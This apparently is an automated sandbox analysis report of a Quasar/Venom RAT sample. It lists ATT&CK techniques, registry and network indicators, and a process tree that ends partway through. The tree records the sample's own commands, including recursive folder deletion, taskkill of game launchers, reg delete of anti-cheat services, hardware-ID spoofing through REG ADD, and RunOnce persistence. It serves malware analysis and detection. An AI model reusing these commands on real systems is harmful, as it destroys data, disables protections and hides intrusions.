quasar | 3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Hsjdosj.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Hsjdosj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Hsjdosj.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Gptmvmjkvvg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Images.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 7 IoCs

pid	Process
6032	Hsjdosj.exe
2236	Gptmvmjkvvg.exe
5836	Oajujxo.exe
4892	Images.exe
3276	Gptmvmjkvvg.exe
5308	Images.exe
3948	Images.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000800000002431f-7.dat	themida
behavioral1/memory/6032-28-0x00007FF67EDB0000-0x00007FF67F587000-memory.dmp	themida
behavioral1/memory/6032-44-0x00007FF67EDB0000-0x00007FF67F587000-memory.dmp	themida
behavioral1/memory/6032-46-0x00007FF67EDB0000-0x00007FF67F587000-memory.dmp	themida
behavioral1/memory/6032-48-0x00007FF67EDB0000-0x00007FF67F587000-memory.dmp	themida
behavioral1/memory/6032-89-0x00007FF67EDB0000-0x00007FF67F587000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe"	WScript.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Hsjdosj.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4716	powershell.exe
2748	powershell.exe
3956	powershell.exe
5248	powershell.exe
4032	powershell.exe
3056	powershell.exe
1896	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	raw.githubusercontent.com
21	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Images.exe	Images.exe
File opened for modification	C:\Windows\SysWOW64\Images.exe	WScript.exe
File created	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe
File opened for modification	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
6032	Hsjdosj.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gptmvmjkvvg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Oajujxo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Images.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gptmvmjkvvg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Images.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Images.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4940	cmd.exe
1972	PING.EXE
5580	reg.exe
2260	cmd.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Apple-250901713632761"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Apple-25090-17136-32761278"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Apple-25090-17136-32761278"	reg.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5696	ipconfig.exe
4988	ipconfig.exe
2292	ipconfig.exe

Kills process with taskkill 13 IoCs

defense_evasion

pid	Process
4748	taskkill.exe
952	taskkill.exe
6088	taskkill.exe
1264	taskkill.exe
3032	taskkill.exe
5160	taskkill.exe
4876	taskkill.exe
5712	taskkill.exe
424	taskkill.exe
6044	taskkill.exe
4704	taskkill.exe
2484	taskkill.exe
1748	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	Images.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Interface	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Interface\ClsidStore = 250932788417857243411390123291292222059428630127402428117774	reg.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
852	reg.exe
5396	reg.exe
1192	reg.exe
2256	reg.exe
5756	reg.exe
5508	reg.exe
2152	reg.exe
3036	reg.exe
4864	reg.exe
2840	reg.exe
4172	reg.exe
5296	reg.exe
3036	reg.exe
5216	reg.exe
3460	reg.exe
4320	reg.exe
4288	reg.exe
5124	reg.exe
5580	reg.exe
3956	reg.exe
5916	reg.exe
5560	reg.exe
5256	reg.exe
4448	reg.exe
3444	reg.exe
3684	reg.exe
3296	reg.exe
1736	reg.exe
2416	reg.exe
400	reg.exe
224	reg.exe
1368	reg.exe
1740	reg.exe
2360	reg.exe
3652	reg.exe
5616	reg.exe
3056	reg.exe
4876	reg.exe
944	reg.exe
5364	reg.exe
4072	reg.exe
3344	reg.exe
3344	reg.exe
364	reg.exe
1108	reg.exe
4780	reg.exe
2212	reg.exe
3472	reg.exe
4748	reg.exe
2208	reg.exe
5292	reg.exe
208	reg.exe
872	reg.exe
5984	reg.exe
4756	reg.exe
2532	reg.exe
620	reg.exe
3500	reg.exe
1572	reg.exe
3108	reg.exe
2044	reg.exe
5980	reg.exe
1680	reg.exe
3992	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1972	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4740	schtasks.exe
3220	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe
4892	Images.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	5836	Oajujxo.exe
Token: SeDebugPrivilege	2236	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	4748	taskkill.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	4876	taskkill.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	424	taskkill.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	2236	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	2236	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	6044	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeDebugPrivilege	6088	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	5160	taskkill.exe
Token: SeDebugPrivilege	4892	Images.exe
Token: SeDebugPrivilege	5712	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	4892	Images.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4580 wrote to memory of 6032	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	88
PID 4580 wrote to memory of 6032	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	88
PID 4580 wrote to memory of 2236	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	91
PID 4580 wrote to memory of 2236	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	91
PID 4580 wrote to memory of 2236	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	91
PID 4580 wrote to memory of 5836	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	92
PID 4580 wrote to memory of 5836	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	92
PID 4580 wrote to memory of 5836	4580	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	92
PID 6032 wrote to memory of 1532	6032	Hsjdosj.exe	175
PID 6032 wrote to memory of 1532	6032	Hsjdosj.exe	175
PID 6032 wrote to memory of 3952	6032	Hsjdosj.exe	95
PID 6032 wrote to memory of 3952	6032	Hsjdosj.exe	95
PID 6032 wrote to memory of 3560	6032	Hsjdosj.exe	286
PID 6032 wrote to memory of 3560	6032	Hsjdosj.exe	286
PID 6032 wrote to memory of 4468	6032	Hsjdosj.exe	97
PID 6032 wrote to memory of 4468	6032	Hsjdosj.exe	97
PID 2236 wrote to memory of 4740	2236	Gptmvmjkvvg.exe	100
PID 2236 wrote to memory of 4740	2236	Gptmvmjkvvg.exe	100
PID 2236 wrote to memory of 4740	2236	Gptmvmjkvvg.exe	100
PID 6032 wrote to memory of 464	6032	Hsjdosj.exe	102
PID 6032 wrote to memory of 464	6032	Hsjdosj.exe	102
PID 464 wrote to memory of 4748	464	cmd.exe	295
PID 464 wrote to memory of 4748	464	cmd.exe	295
PID 6032 wrote to memory of 404	6032	Hsjdosj.exe	409
PID 6032 wrote to memory of 404	6032	Hsjdosj.exe	409
PID 2236 wrote to memory of 4892	2236	Gptmvmjkvvg.exe	104
PID 2236 wrote to memory of 4892	2236	Gptmvmjkvvg.exe	104
PID 2236 wrote to memory of 4892	2236	Gptmvmjkvvg.exe	104
PID 404 wrote to memory of 4876	404	cmd.exe	297
PID 404 wrote to memory of 4876	404	cmd.exe	297
PID 6032 wrote to memory of 4940	6032	Hsjdosj.exe	195
PID 6032 wrote to memory of 4940	6032	Hsjdosj.exe	195
PID 4940 wrote to memory of 424	4940	cmd.exe	193
PID 4940 wrote to memory of 424	4940	cmd.exe	193
PID 6032 wrote to memory of 944	6032	Hsjdosj.exe	299
PID 6032 wrote to memory of 944	6032	Hsjdosj.exe	299
PID 944 wrote to memory of 952	944	cmd.exe	110
PID 944 wrote to memory of 952	944	cmd.exe	110
PID 6032 wrote to memory of 2996	6032	Hsjdosj.exe	111
PID 6032 wrote to memory of 2996	6032	Hsjdosj.exe	111
PID 2996 wrote to memory of 6044	2996	cmd.exe	112
PID 2996 wrote to memory of 6044	2996	cmd.exe	112
PID 6032 wrote to memory of 5524	6032	Hsjdosj.exe	113
PID 6032 wrote to memory of 5524	6032	Hsjdosj.exe	113
PID 5524 wrote to memory of 4704	5524	cmd.exe	304
PID 5524 wrote to memory of 4704	5524	cmd.exe	304
PID 6032 wrote to memory of 1588	6032	Hsjdosj.exe	204
PID 6032 wrote to memory of 1588	6032	Hsjdosj.exe	204
PID 1588 wrote to memory of 2484	1588	cmd.exe	311
PID 1588 wrote to memory of 2484	1588	cmd.exe	311
PID 6032 wrote to memory of 5256	6032	Hsjdosj.exe	309
PID 6032 wrote to memory of 5256	6032	Hsjdosj.exe	309
PID 5256 wrote to memory of 6088	5256	cmd.exe	118
PID 5256 wrote to memory of 6088	5256	cmd.exe	118
PID 6032 wrote to memory of 3676	6032	Hsjdosj.exe	119
PID 6032 wrote to memory of 3676	6032	Hsjdosj.exe	119
PID 3676 wrote to memory of 1264	3676	cmd.exe	121
PID 3676 wrote to memory of 1264	3676	cmd.exe	121
PID 2236 wrote to memory of 5648	2236	Gptmvmjkvvg.exe	228
PID 2236 wrote to memory of 5648	2236	Gptmvmjkvvg.exe	228
PID 2236 wrote to memory of 5648	2236	Gptmvmjkvvg.exe	228
PID 6032 wrote to memory of 5816	6032	Hsjdosj.exe	124
PID 6032 wrote to memory of 5816	6032	Hsjdosj.exe	124
PID 5816 wrote to memory of 3032	5816	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
"C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe
  "C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 0b
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im steam.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5524
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5256
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5816
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1420
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:3416
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:3540
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      Modifies registry key
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-25083 /f
      4⤵
      Modifies registry key
      PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple25087-6387-14897-8983 /f
      4⤵
      Modifies registry key
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
    3⤵
    PID:4756
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-25087-%random} /f
      4⤵
      Modifies registry key
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:424
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-25087638714897 /f
      4⤵
      Modifies registry key
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-25087 /f
      4⤵
      PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:2984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-25090 /f
      4⤵
      Modifies registry key
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:3752
  - - C:\Windows\system32\reg.exe
